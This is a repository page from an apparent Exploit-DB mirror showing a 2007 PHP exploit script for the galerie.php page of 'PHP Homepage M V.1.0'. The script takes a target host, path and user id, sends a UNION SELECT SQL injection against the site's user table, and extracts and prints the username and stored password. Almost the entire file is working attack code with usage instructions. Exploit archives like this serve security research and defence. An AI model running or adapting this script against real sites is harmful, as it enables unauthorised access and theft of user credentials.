bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4501.php
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

37 lines
No EOL
964 B
PHP
Raw Permalink Blame History

<?php
if ($argv[1] == '')
{
echo "--PHP Homepage M V.1.0 galerie.php Exploit----\n";
echo "only with magic_quotes_gpc OFF\n";
echo "by [PHCN] Mahjong\n";
echo "Usage : phpHPmv1.php http://127.0.0.1 / 1\n";
echo '----------------------------------------------';
}
else
{
$host = $argv[1];
$path = $argv[2];
$userid = $argv[3];
$data = $host.$path."galerie.php?act=show&id=99999'+UNION+SELECT+username,passwort,passwort,passwort+FROM+user+WHERE+U ID='$userid";
$data = file_get_contents($data);
$pw = substr($data,strpos($data,'<img border="0" src=\'bilder/')+28,30);
$pw = explode('.',$pw);
$pw = $pw[0];
$user = substr($data,strpos($data,'UID=\''.$userid.'\'<h1 align="center">',30));
$user = explode('>',$user);
$user = strrev($user[1]);
$user = substr($user,4,100);
$user = strrev($user);
echo "--EXPLOIT FINISHED--\n";
echo "userid : $userid\n";
echo "username: $user\n";
echo "password: $pw\n";
echo '--------------------';
}
?>
# milw0rm.com [2007-10-08]
Reference in a new issue View git blame Copy permalink